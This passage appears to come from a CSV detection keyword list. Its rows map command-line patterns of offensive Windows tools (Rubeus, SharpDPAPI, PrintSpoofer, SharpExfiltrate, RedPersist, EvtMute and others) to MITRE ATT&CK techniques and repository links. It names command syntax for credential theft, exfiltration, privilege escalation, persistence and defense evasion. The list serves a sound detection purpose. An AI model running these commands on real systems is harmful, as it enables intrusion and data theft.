tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*.exe -b all -f json --dir results -cc*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*.exe backupkey /nowrap *.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe certificates /mkfile:*.txt*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe client *:* R:socks*,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe compute --sid * --kdskey *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe computername=* command=* username=* password=* nla=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* takeover=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* connectdrive=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* elevated=taskmgr*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* elevated=winr*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* exec=cmd*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe create /payload* /kb*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*.exe credentials /pvk:*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -d * -u * -p * -m LDAPS*,offensive_tool_keyword,SharpLdapRelayScan,SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan,T1557.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/klezVirus/SharpLdapRelayScan,1,1,N/A,7,1,72,16,2022-02-26T22:03:11Z,2022-02-12T08:16:59Z -*.exe -d 1 -c cmd.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe -d 3 -c *powershell -ep bypass*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe dump /luid:0x5379f2 /nowrap*,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --eventviewer *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe exec * cmd interactive*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*.exe Get-DomainController -Domain * -Server * -Credential *,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*.exe -gettgs -luid:*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*.exe gmsainfo --sid *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe -group=all *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=all -full*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=remote *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=system *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=user *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe hash /password:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*.exe -i -c powershell.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe kdsinfo --guid *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe krbscm -c *cmd.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*.exe machinetriage*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe masterkeys /hashes*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe masterkeys /hashes*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe monitor /interval:5 /nowrap,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe NonstandardProcesses*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe NTLMSettings*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe OneDrive --username * --password * --filepath *\*.exe*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe --override-file --source-file *.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe ptt /ticket:*,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe -ptt ticket:*.kirbi*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*.exe --pwsh *.ps1 *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe -q InterestingProcesses*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -q PowerShell*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -q WindowsDefender*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe rbcd -m * -p * -c *cmd.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe --remove-reparse --source-file *.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe -s * -c service_mod *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*.exe -s *\x*\x*\x*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*,offensive_tool_keyword,AD exploitation cheat sheet,Rubeus access the LDAP service on the DC (for dcsync),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --schedule * *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe --screensaver *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe Search Find-Persist*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*.exe --set-reparse override --source-file *.exe --target-file *,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe shadowcred -c * -f*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe -sniffer n*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*.exe --startup *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe -t startupfolder -c * -a * -f*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*.exe -t tortoisesvn -c * -a * -m*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*.exe triage,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe triage /password:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -uac,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*.exe --ui *,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --winlogon * *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe --wmi *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe* -d localhost * -u * -p */24*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*.exe* -f *.bin -t queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --Filter *rule disable { condition: true }*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,0,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*.exe* -t queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -t remotethread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -t 